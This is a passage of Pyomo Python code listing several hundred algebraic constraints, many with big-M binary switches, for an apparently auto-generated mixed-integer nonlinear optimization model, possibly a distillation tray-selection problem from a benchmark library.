m.c23 = Constraint(expr=(100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x49 + m.x86*
m.x73 - (100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x51 - m.x86*m.x71
- 80*m.b19 - 1000*m.b7 + 1000*m.b31 <= 1000)
m.c24 = Constraint(expr=(100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x50 + m.x86*
m.x74 - (100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x52 - m.x86*m.x72
- 20*m.b19 - 1000*m.b7 + 1000*m.b31 <= 1000)
m.c25 = Constraint(expr=(100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x51 + m.x86*m.x75 - (100*
m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x53 - m.x86*m.x73 - 80*m.b20 - 1000*m.b8
+ 1000*m.b32 <= 1000)
m.c26 = Constraint(expr=(100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x52 + m.x86*m.x76 - (100*
m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x54 - m.x86*m.x74 - 20*m.b20 - 1000*m.b8
+ 1000*m.b32 <= 1000)
m.c27 = Constraint(expr=(100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x53 + m.x86*m.x77 - (100*m.b22 + 100*
m.b23 + 100*m.b24 + m.x85)*m.x55 - m.x86*m.x75 - 80*m.b21 - 1000*m.b9 + 1000*m.b33 <= 1000)
m.c28 = Constraint(expr=(100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x54 + m.x86*m.x78 - (100*m.b22 + 100*
m.b23 + 100*m.b24 + m.x85)*m.x56 - m.x86*m.x76 - 20*m.b21 - 1000*m.b9 + 1000*m.b33 <= 1000)
m.c29 = Constraint(expr=(100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x55 + m.x86*m.x79 - (100*m.b23 + 100*m.b24 + m.x85
)*m.x57 - m.x86*m.x77 - 80*m.b22 - 1000*m.b10 + 1000*m.b34 <= 1000)
m.c30 = Constraint(expr=(100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x56 + m.x86*m.x80 - (100*m.b23 + 100*m.b24 + m.x85
)*m.x58 - m.x86*m.x78 - 20*m.b22 - 1000*m.b10 + 1000*m.b34 <= 1000)
m.c31 = Constraint(expr=(100*m.b23 + 100*m.b24 + m.x85)*m.x57 + m.x86*m.x81 - (100*m.b24 + m.x85)*m.x59 - m.x86*m.x79 -
80*m.b23 - 1000*m.b11 + 1000*m.b35 <= 1000)
m.c32 = Constraint(expr=(100*m.b23 + 100*m.b24 + m.x85)*m.x58 + m.x86*m.x82 - (100*m.b24 + m.x85)*m.x60 - m.x86*m.x80 -
20*m.b23 - 1000*m.b11 + 1000*m.b35 <= 1000)
m.c33 = Constraint(expr=m.x86*m.x61 - (100 + m.x85)*m.x39 + 80*m.x37 == 0)
m.c34 = Constraint(expr=m.x86*m.x62 - (100 + m.x85)*m.x40 + 80*m.x38 == 0)
m.c35 = Constraint(expr=(100*m.b14 + 100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21
+ 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x39 + m.x86*m.x63 - (100*m.b15 + 100*m.b16 + 100
*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x41 - m.x86*m.x61 - 80*m.b14 - 1000*m.b2 + 1000*m.b26 >= 1000)
m.c36 = Constraint(expr=(100*m.b14 + 100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21
+ 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x40 + m.x86*m.x64 - (100*m.b15 + 100*m.b16 + 100
*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x42 - m.x86*m.x62 - 20*m.b14 - 1000*m.b2 + 1000*m.b26 >= 1000)
m.c37 = Constraint(expr=(100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22
+ 100*m.b23 + 100*m.b24 + m.x85)*m.x41 + m.x86*m.x65 - (100*m.b16 + 100*m.b17 + 100*m.b18 + 100
*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x43 - m.x86*m.x63
- 80*m.b15 - 1000*m.b3 + 1000*m.b27 >= 1000)
m.c38 = Constraint(expr=(100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22
+ 100*m.b23 + 100*m.b24 + m.x85)*m.x42 + m.x86*m.x66 - (100*m.b16 + 100*m.b17 + 100*m.b18 + 100
*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x44 - m.x86*m.x64
- 20*m.b15 - 1000*m.b3 + 1000*m.b27 >= 1000)
m.c39 = Constraint(expr=(100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23
+ 100*m.b24 + m.x85)*m.x43 + m.x86*m.x67 - (100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100
*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x45 - m.x86*m.x65 - 80*m.b16 - 1000*m.b4
+ 1000*m.b28 >= 1000)
m.c40 = Constraint(expr=(100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23
+ 100*m.b24 + m.x85)*m.x44 + m.x86*m.x68 - (100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100
*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x46 - m.x86*m.x66 - 20*m.b16 - 1000*m.b4
+ 1000*m.b28 >= 1000)
m.c41 = Constraint(expr=(100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24
+ m.x85)*m.x45 + m.x86*m.x69 - (100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100
*m.b23 + 100*m.b24 + m.x85)*m.x47 - m.x86*m.x67 - 80*m.b17 - 1000*m.b5 + 1000*m.b29 >= 1000)
m.c42 = Constraint(expr=(100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24
+ m.x85)*m.x46 + m.x86*m.x70 - (100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100
*m.b23 + 100*m.b24 + m.x85)*m.x48 - m.x86*m.x68 - 20*m.b17 - 1000*m.b5 + 1000*m.b29 >= 1000)
m.c43 = Constraint(expr=(100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*
m.x47 + m.x86*m.x71 - (100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x49 - m.x86*m.x69 - 80*m.b18 - 1000*m.b6 + 1000*m.b30 >= 1000)
m.c44 = Constraint(expr=(100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*
m.x48 + m.x86*m.x72 - (100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x50 - m.x86*m.x70 - 20*m.b18 - 1000*m.b6 + 1000*m.b30 >= 1000)
m.c45 = Constraint(expr=(100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x49 + m.x86*
m.x73 - (100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x51 - m.x86*m.x71
- 80*m.b19 - 1000*m.b7 + 1000*m.b31 >= 1000)
m.c46 = Constraint(expr=(100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x50 + m.x86*
m.x74 - (100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x52 - m.x86*m.x72
- 20*m.b19 - 1000*m.b7 + 1000*m.b31 >= 1000)
m.c47 = Constraint(expr=(100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x51 + m.x86*m.x75 - (100*
m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x53 - m.x86*m.x73 - 80*m.b20 - 1000*m.b8
+ 1000*m.b32 >= 1000)
m.c48 = Constraint(expr=(100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x52 + m.x86*m.x76 - (100*
m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x54 - m.x86*m.x74 - 20*m.b20 - 1000*m.b8
+ 1000*m.b32 >= 1000)
m.c49 = Constraint(expr=(100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x53 + m.x86*m.x77 - (100*m.b22 + 100*
m.b23 + 100*m.b24 + m.x85)*m.x55 - m.x86*m.x75 - 80*m.b21 - 1000*m.b9 + 1000*m.b33 >= 1000)
m.c50 = Constraint(expr=(100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x54 + m.x86*m.x78 - (100*m.b22 + 100*
m.b23 + 100*m.b24 + m.x85)*m.x56 - m.x86*m.x76 - 20*m.b21 - 1000*m.b9 + 1000*m.b33 >= 1000)
m.c51 = Constraint(expr=(100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x55 + m.x86*m.x79 - (100*m.b23 + 100*m.b24 + m.x85
)*m.x57 - m.x86*m.x77 - 80*m.b22 - 1000*m.b10 + 1000*m.b34 >= 1000)
m.c52 = Constraint(expr=(100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x56 + m.x86*m.x80 - (100*m.b23 + 100*m.b24 + m.x85
)*m.x58 - m.x86*m.x78 - 20*m.b22 - 1000*m.b10 + 1000*m.b34 >= 1000)
m.c53 = Constraint(expr=(100*m.b23 + 100*m.b24 + m.x85)*m.x57 + m.x86*m.x81 - (100*m.b24 + m.x85)*m.x59 - m.x86*m.x79 -
80*m.b23 - 1000*m.b11 + 1000*m.b35 >= 1000)
m.c54 = Constraint(expr=(100*m.b23 + 100*m.b24 + m.x85)*m.x58 + m.x86*m.x82 - (100*m.b24 + m.x85)*m.x60 - m.x86*m.x80 -
20*m.b23 - 1000*m.b11 + 1000*m.b35 >= 1000)
m.c55 = Constraint(expr=m.x85*m.x39 + m.x87*m.x63 - m.x86*m.x61 + 1000*m.b2 <= 1000)
m.c56 = Constraint(expr=m.x85*m.x40 + m.x87*m.x64 - m.x86*m.x62 + 1000*m.b2 <= 1000)
m.c57 = Constraint(expr=m.x85*m.x41 + m.x87*m.x65 - m.x86*m.x63 + 1000*m.b3 <= 1000)
m.c58 = Constraint(expr=m.x85*m.x42 + m.x87*m.x66 - m.x86*m.x64 + 1000*m.b3 <= 1000)
m.c59 = Constraint(expr=m.x85*m.x43 + m.x87*m.x67 - m.x86*m.x65 + 1000*m.b4 <= 1000)
m.c60 = Constraint(expr=m.x85*m.x44 + m.x87*m.x68 - m.x86*m.x66 + 1000*m.b4 <= 1000)
m.c61 = Constraint(expr=m.x85*m.x45 + m.x87*m.x69 - m.x86*m.x67 + 1000*m.b5 <= 1000)
m.c62 = Constraint(expr=m.x85*m.x46 + m.x87*m.x70 - m.x86*m.x68 + 1000*m.b5 <= 1000)
m.c63 = Constraint(expr=m.x85*m.x47 + m.x87*m.x71 - m.x86*m.x69 + 1000*m.b6 <= 1000)
m.c64 = Constraint(expr=m.x85*m.x48 + m.x87*m.x72 - m.x86*m.x70 + 1000*m.b6 <= 1000)
m.c65 = Constraint(expr=m.x85*m.x49 + m.x87*m.x73 - m.x86*m.x71 + 1000*m.b7 <= 1000)
m.c66 = Constraint(expr=m.x85*m.x50 + m.x87*m.x74 - m.x86*m.x72 + 1000*m.b7 <= 1000)
m.c67 = Constraint(expr=m.x85*m.x51 + m.x87*m.x75 - m.x86*m.x73 + 1000*m.b8 <= 1000)
m.c68 = Constraint(expr=m.x85*m.x52 + m.x87*m.x76 - m.x86*m.x74 + 1000*m.b8 <= 1000)
m.c69 = Constraint(expr=m.x85*m.x53 + m.x87*m.x77 - m.x86*m.x75 + 1000*m.b9 <= 1000)
m.c70 = Constraint(expr=m.x85*m.x54 + m.x87*m.x78 - m.x86*m.x76 + 1000*m.b9 <= 1000)
m.c71 = Constraint(expr=m.x85*m.x55 + m.x87*m.x79 - m.x86*m.x77 + 1000*m.b10 <= 1000)
m.c72 = Constraint(expr=m.x85*m.x56 + m.x87*m.x80 - m.x86*m.x78 + 1000*m.b10 <= 1000)
m.c73 = Constraint(expr=m.x85*m.x57 + m.x87*m.x81 - m.x86*m.x79 + 1000*m.b11 <= 1000)
m.c74 = Constraint(expr=m.x85*m.x58 + m.x87*m.x82 - m.x86*m.x80 + 1000*m.b11 <= 1000)
m.c75 = Constraint(expr=m.x85*m.x59 + m.x87*m.x83 - m.x86*m.x81 + 1000*m.b12 <= 1000)
m.c76 = Constraint(expr=m.x85*m.x60 + m.x87*m.x84 - m.x86*m.x82 + 1000*m.b12 <= 1000)
m.c77 = Constraint(expr=m.x85*m.x39 + m.x87*m.x63 - m.x86*m.x61 - 1000*m.b2 >= -1000)
m.c78 = Constraint(expr=m.x85*m.x40 + m.x87*m.x64 - m.x86*m.x62 - 1000*m.b2 >= -1000)
m.c79 = Constraint(expr=m.x85*m.x41 + m.x87*m.x65 - m.x86*m.x63 - 1000*m.b3 >= -1000)
m.c80 = Constraint(expr=m.x85*m.x42 + m.x87*m.x66 - m.x86*m.x64 - 1000*m.b3 >= -1000)
m.c81 = Constraint(expr=m.x85*m.x43 + m.x87*m.x67 - m.x86*m.x65 - 1000*m.b4 >= -1000)
m.c82 = Constraint(expr=m.x85*m.x44 + m.x87*m.x68 - m.x86*m.x66 - 1000*m.b4 >= -1000)
m.c83 = Constraint(expr=m.x85*m.x45 + m.x87*m.x69 - m.x86*m.x67 - 1000*m.b5 >= -1000)
m.c84 = Constraint(expr=m.x85*m.x46 + m.x87*m.x70 - m.x86*m.x68 - 1000*m.b5 >= -1000)
m.c85 = Constraint(expr=m.x85*m.x47 + m.x87*m.x71 - m.x86*m.x69 - 1000*m.b6 >= -1000)
m.c86 = Constraint(expr=m.x85*m.x48 + m.x87*m.x72 - m.x86*m.x70 - 1000*m.b6 >= -1000)
m.c87 = Constraint(expr=m.x85*m.x49 + m.x87*m.x73 - m.x86*m.x71 - 1000*m.b7 >= -1000)
m.c88 = Constraint(expr=m.x85*m.x50 + m.x87*m.x74 - m.x86*m.x72 - 1000*m.b7 >= -1000)
m.c89 = Constraint(expr=m.x85*m.x51 + m.x87*m.x75 - m.x86*m.x73 - 1000*m.b8 >= -1000)
m.c90 = Constraint(expr=m.x85*m.x52 + m.x87*m.x76 - m.x86*m.x74 - 1000*m.b8 >= -1000)
m.c91 = Constraint(expr=m.x85*m.x53 + m.x87*m.x77 - m.x86*m.x75 - 1000*m.b9 >= -1000)
m.c92 = Constraint(expr=m.x85*m.x54 + m.x87*m.x78 - m.x86*m.x76 - 1000*m.b9 >= -1000)
m.c93 = Constraint(expr=m.x85*m.x55 + m.x87*m.x79 - m.x86*m.x77 - 1000*m.b10 >= -1000)
m.c94 = Constraint(expr=m.x85*m.x56 + m.x87*m.x80 - m.x86*m.x78 - 1000*m.b10 >= -1000)
m.c95 = Constraint(expr=m.x85*m.x57 + m.x87*m.x81 - m.x86*m.x79 - 1000*m.b11 >= -1000)
m.c96 = Constraint(expr=m.x85*m.x58 + m.x87*m.x82 - m.x86*m.x80 - 1000*m.b11 >= -1000)
m.c97 = Constraint(expr=m.x85*m.x59 + m.x87*m.x83 - m.x86*m.x81 - 1000*m.b12 >= -1000)
m.c98 = Constraint(expr=m.x85*m.x60 + m.x87*m.x84 - m.x86*m.x82 - 1000*m.b12 >= -1000)
m.c99 = Constraint(expr=-m.x88*m.x87 + m.x85 == 0)
m.c100 = Constraint(expr= m.b13 + m.b14 + m.b15 + m.b16 + m.b17 + m.b18 + m.b19 + m.b20 + m.b21 + m.b22 + m.b23
+ m.b24 == 1)
m.c101 = Constraint(expr= m.b1 + m.b2 + m.b3 + m.b4 + m.b5 + m.b6 + m.b7 + m.b8 + m.b9 + m.b10 + m.b11 + m.b12 == 1)
m.c102 = Constraint(expr= m.b25 + m.b26 + m.b27 + m.b28 + m.b29 + m.b30 + m.b31 + m.b32 + m.b33 + m.b34 + m.b35
+ m.b36 == 12)
m.c103 = Constraint(expr= m.b1 + 2*m.b2 + 3*m.b3 + 4*m.b4 + 5*m.b5 + 6*m.b6 + 7*m.b7 + 8*m.b8 + 9*m.b9 + 10*m.b10
+ 11*m.b11 + 12*m.b12 == 12)
m.c104 = Constraint(expr= - m.b1 - 2*m.b2 - 3*m.b3 - 4*m.b4 - 5*m.b5 - 6*m.b6 - 7*m.b7 - 8*m.b8 - 9*m.b9 - 10*m.b10
- 11*m.b11 - 12*m.b12 + m.b13 + 2*m.b14 + 3*m.b15 + 4*m.b16 + 5*m.b17 + 6*m.b18 + 7*m.b19
+ 8*m.b20 + 9*m.b21 + 10*m.b22 + 11*m.b23 + 12*m.b24 <= 0)
m.c105 = Constraint(expr= m.b1 - m.b25 <= 0)
m.c106 = Constraint(expr= m.b2 - m.b26 <= 0)
m.c107 = Constraint(expr= m.b3 - m.b27 <= 0)
m.c108 = Constraint(expr= m.b4 - m.b28 <= 0)
m.c109 = Constraint(expr= m.b5 - m.b29 <= 0)
m.c110 = Constraint(expr= m.b6 - m.b30 <= 0)
m.c111 = Constraint(expr= m.b7 - m.b31 <= 0)
m.c112 = Constraint(expr= m.b8 - m.b32 <= 0)
m.c113 = Constraint(expr= m.b9 - m.b33 <= 0)
m.c114 = Constraint(expr= m.b10 - m.b34 <= 0)
m.c115 = Constraint(expr= m.b11 - m.b35 <= 0)
m.c116 = Constraint(expr= m.b12 - m.b36 <= 0)
m.c117 = Constraint(expr= m.b13 - m.b25 <= 0)
m.c118 = Constraint(expr= m.b14 - m.b26 <= 0)
m.c119 = Constraint(expr= m.b15 - m.b27 <= 0)
m.c120 = Constraint(expr= m.b16 - m.b28 <= 0)
m.c121 = Constraint(expr= m.b17 - m.b29 <= 0)
m.c122 = Constraint(expr= m.b18 - m.b30 <= 0)
m.c123 = Constraint(expr= m.b19 - m.b31 <= 0)
m.c124 = Constraint(expr= m.b20 - m.b32 <= 0)
m.c125 = Constraint(expr= m.b21 - m.b33 <= 0)
m.c126 = Constraint(expr= m.b22 - m.b34 <= 0)
m.c127 = Constraint(expr= m.b23 - m.b35 <= 0)
m.c128 = Constraint(expr= m.b24 - m.b36 <= 0)
m.c129 = Constraint(expr= - m.b1 - m.b2 - m.b3 - m.b4 - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b25
<= 0)
m.c130 = Constraint(expr= - m.b2 - m.b3 - m.b4 - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b26 <= 0)
m.c131 = Constraint(expr= - m.b3 - m.b4 - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b27 <= 0)
m.c132 = Constraint(expr= - m.b4 - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b28 <= 0)
m.c133 = Constraint(expr= - m.b5 - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b29 <= 0)
m.c134 = Constraint(expr= - m.b6 - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b30 <= 0)
m.c135 = Constraint(expr= - m.b7 - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b31 <= 0)
m.c136 = Constraint(expr= - m.b8 - m.b9 - m.b10 - m.b11 - m.b12 + m.b32 <= 0)
m.c137 = Constraint(expr= - m.b9 - m.b10 - m.b11 - m.b12 + m.b33 <= 0)
m.c138 = Constraint(expr= - m.b10 - m.b11 - m.b12 + m.b34 <= 0)
m.c139 = Constraint(expr= - m.b11 - m.b12 + m.b35 <= 0)
m.c140 = Constraint(expr= - m.b12 + m.b36 <= 0)
m.c141 = Constraint(expr= - m.b25 - m.x61 - m.x62 <= 0)
m.c142 = Constraint(expr= - m.b26 - m.x63 - m.x64 <= 0)
m.c143 = Constraint(expr= - m.b27 - m.x65 - m.x66 <= 0)
m.c144 = Constraint(expr= - m.b28 - m.x67 - m.x68 <= 0)
m.c145 = Constraint(expr= - m.b29 - m.x69 - m.x70 <= 0)
m.c146 = Constraint(expr= - m.b30 - m.x71 - m.x72 <= 0)
m.c147 = Constraint(expr= - m.b31 - m.x73 - m.x74 <= 0)
m.c148 = Constraint(expr= - m.b32 - m.x75 - m.x76 <= 0)
m.c149 = Constraint(expr= - m.b33 - m.x77 - m.x78 <= 0)
m.c150 = Constraint(expr= - m.b34 - m.x79 - m.x80 <= 0)
m.c151 = Constraint(expr= - m.b35 - m.x81 - m.x82 <= 0)
m.c152 = Constraint(expr= - m.b36 - m.x83 - m.x84 <= 0)
m.c153 = Constraint(expr= m.b25 - m.x61 - m.x62 <= 0)
m.c154 = Constraint(expr= m.b26 - m.x63 - m.x64 <= 0)
m.c155 = Constraint(expr= m.b27 - m.x65 - m.x66 <= 0)
m.c156 = Constraint(expr= m.b28 - m.x67 - m.x68 <= 0)
m.c157 = Constraint(expr= m.b29 - m.x69 - m.x70 <= 0)
m.c158 = Constraint(expr= m.b30 - m.x71 - m.x72 <= 0)
m.c159 = Constraint(expr= m.b31 - m.x73 - m.x74 <= 0)
m.c160 = Constraint(expr= m.b32 - m.x75 - m.x76 <= 0)
m.c161 = Constraint(expr= m.b33 - m.x77 - m.x78 <= 0)
m.c162 = Constraint(expr= m.b34 - m.x79 - m.x80 <= 0)
m.c163 = Constraint(expr= m.b35 - m.x81 - m.x82 <= 0)
m.c164 = Constraint(expr= m.b36 - m.x83 - m.x84 <= 0)
m.c165 = Constraint(expr= - m.b25 - m.x37 - m.x38 <= 0)
m.c166 = Constraint(expr= - m.b26 - m.x39 - m.x40 <= 0)
m.c167 = Constraint(expr= - m.b27 - m.x41 - m.x42 <= 0)
m.c168 = Constraint(expr= - m.b28 - m.x43 - m.x44 <= 0)
m.c169 = Constraint(expr= - m.b29 - m.x45 - m.x46 <= 0)
m.c170 = Constraint(expr= - m.b30 - m.x47 - m.x48 <= 0)
m.c171 = Constraint(expr= - m.b31 - m.x49 - m.x50 <= 0)
m.c172 = Constraint(expr= - m.b32 - m.x51 - m.x52 <= 0)
m.c173 = Constraint(expr= - m.b33 - m.x53 - m.x54 <= 0)
m.c174 = Constraint(expr= - m.b34 - m.x55 - m.x56 <= 0)
m.c175 = Constraint(expr= - m.b35 - m.x57 - m.x58 <= 0)
m.c176 = Constraint(expr= - m.b36 - m.x59 - m.x60 <= 0)
m.c177 = Constraint(expr= m.b25 - m.x37 - m.x38 <= 0)
m.c178 = Constraint(expr= m.b26 - m.x39 - m.x40 <= 0)
m.c179 = Constraint(expr= m.b27 - m.x41 - m.x42 <= 0)
m.c180 = Constraint(expr= m.b28 - m.x43 - m.x44 <= 0)
m.c181 = Constraint(expr= m.b29 - m.x45 - m.x46 <= 0)
m.c182 = Constraint(expr= m.b30 - m.x47 - m.x48 <= 0)
m.c183 = Constraint(expr= m.b31 - m.x49 - m.x50 <= 0)
m.c184 = Constraint(expr= m.b32 - m.x51 - m.x52 <= 0)
m.c185 = Constraint(expr= m.b33 - m.x53 - m.x54 <= 0)
m.c186 = Constraint(expr= m.b34 - m.x55 - m.x56 <= 0)
m.c187 = Constraint(expr= m.b35 - m.x57 - m.x58 <= 0)
m.c188 = Constraint(expr= m.b36 - m.x59 - m.x60 <= 0)
m.c189 = Constraint(expr= - m.b25 - m.x61 - m.x62 >= -2)
m.c190 = Constraint(expr= - m.b26 - m.x63 - m.x64 >= -2)
m.c191 = Constraint(expr= - m.b27 - m.x65 - m.x66 >= -2)
m.c192 = Constraint(expr= - m.b28 - m.x67 - m.x68 >= -2)
m.c193 = Constraint(expr= - m.b29 - m.x69 - m.x70 >= -2)
m.c194 = Constraint(expr= - m.b30 - m.x71 - m.x72 >= -2)
m.c195 = Constraint(expr= - m.b31 - m.x73 - m.x74 >= -2)
m.c196 = Constraint(expr= - m.b32 - m.x75 - m.x76 >= -2)
m.c197 = Constraint(expr= - m.b33 - m.x77 - m.x78 >= -2)
m.c198 = Constraint(expr= - m.b34 - m.x79 - m.x80 >= -2)
m.c199 = Constraint(expr= - m.b35 - m.x81 - m.x82 >= -2)
m.c200 = Constraint(expr= - m.b36 - m.x83 - m.x84 >= -2)
m.c201 = Constraint(expr= m.b25 - m.x61 - m.x62 >= -2)
m.c202 = Constraint(expr= m.b26 - m.x63 - m.x64 >= -2)
m.c203 = Constraint(expr= m.b27 - m.x65 - m.x66 >= -2)
m.c204 = Constraint(expr= m.b28 - m.x67 - m.x68 >= -2)
m.c205 = Constraint(expr= m.b29 - m.x69 - m.x70 >= -2)
m.c206 = Constraint(expr= m.b30 - m.x71 - m.x72 >= -2)
m.c207 = Constraint(expr= m.b31 - m.x73 - m.x74 >= -2)
m.c208 = Constraint(expr= m.b32 - m.x75 - m.x76 >= -2)
m.c209 = Constraint(expr= m.b33 - m.x77 - m.x78 >= -2)
m.c210 = Constraint(expr= m.b34 - m.x79 - m.x80 >= -2)
m.c211 = Constraint(expr= m.b35 - m.x81 - m.x82 >= -2)
m.c212 = Constraint(expr= m.b36 - m.x83 - m.x84 >= -2)
m.c213 = Constraint(expr= - m.b25 - m.x37 - m.x38 >= -2)
m.c214 = Constraint(expr= - m.b26 - m.x39 - m.x40 >= -2)
m.c215 = Constraint(expr= - m.b27 - m.x41 - m.x42 >= -2)
m.c216 = Constraint(expr= - m.b28 - m.x43 - m.x44 >= -2)
m.c217 = Constraint(expr= - m.b29 - m.x45 - m.x46 >= -2)
m.c218 = Constraint(expr= - m.b30 - m.x47 - m.x48 >= -2)
m.c219 = Constraint(expr= - m.b31 - m.x49 - m.x50 >= -2)
m.c220 = Constraint(expr= - m.b32 - m.x51 - m.x52 >= -2)
m.c221 = Constraint(expr= - m.b33 - m.x53 - m.x54 >= -2)
m.c222 = Constraint(expr= - m.b34 - m.x55 - m.x56 >= -2)
m.c223 = Constraint(expr= - m.b35 - m.x57 - m.x58 >= -2)
m.c224 = Constraint(expr= - m.b36 - m.x59 - m.x60 >= -2)
m.c225 = Constraint(expr= m.b25 - m.x37 - m.x38 >= -2)
m.c226 = Constraint(expr= m.b26 - m.x39 - m.x40 >= -2)
m.c227 = Constraint(expr= m.b27 - m.x41 - m.x42 >= -2)
m.c228 = Constraint(expr= m.b28 - m.x43 - m.x44 >= -2)
m.c229 = Constraint(expr= m.b29 - m.x45 - m.x46 >= -2)
m.c230 = Constraint(expr= m.b30 - m.x47 - m.x48 >= -2)
m.c231 = Constraint(expr= m.b31 - m.x49 - m.x50 >= -2)
m.c232 = Constraint(expr= m.b32 - m.x51 - m.x52 >= -2)
m.c233 = Constraint(expr= m.b33 - m.x53 - m.x54 >= -2)
m.c234 = Constraint(expr= m.b34 - m.x55 - m.x56 >= -2)
m.c235 = Constraint(expr= m.b35 - m.x57 - m.x58 >= -2)
m.c236 = Constraint(expr= m.b36 - m.x59 - m.x60 >= -2)
m.c237 = Constraint(expr=(m.x37 + 5.13435*m.x38)*m.x61 - m.x37 + 1000*m.b25 <= 1000)
m.c238 = Constraint(expr=(m.x37 + 5.13435*m.x38)*m.x62 - 5.13435*m.x38 + 1000*m.b25 <= 1000)
m.c239 = Constraint(expr=(m.x39 + 5.13435*m.x40)*m.x63 - m.x39 + 1000*m.b26 <= 1000)
m.c240 = Constraint(expr=(m.x39 + 5.13435*m.x40)*m.x64 - 5.13435*m.x40 + 1000*m.b26 <= 1000)
m.c241 = Constraint(expr=(m.x41 + 5.13435*m.x42)*m.x65 - m.x41 + 1000*m.b27 <= 1000)
m.c242 = Constraint(expr=(m.x41 + 5.13435*m.x42)*m.x66 - 5.13435*m.x42 + 1000*m.b27 <= 1000)
m.c243 = Constraint(expr=(m.x43 + 5.13435*m.x44)*m.x67 - m.x43 + 1000*m.b28 <= 1000)
m.c244 = Constraint(expr=(m.x43 + 5.13435*m.x44)*m.x68 - 5.13435*m.x44 + 1000*m.b28 <= 1000)
m.c245 = Constraint(expr=(m.x45 + 5.13435*m.x46)*m.x69 - m.x45 + 1000*m.b29 <= 1000)
m.c246 = Constraint(expr=(m.x45 + 5.13435*m.x46)*m.x70 - 5.13435*m.x46 + 1000*m.b29 <= 1000)
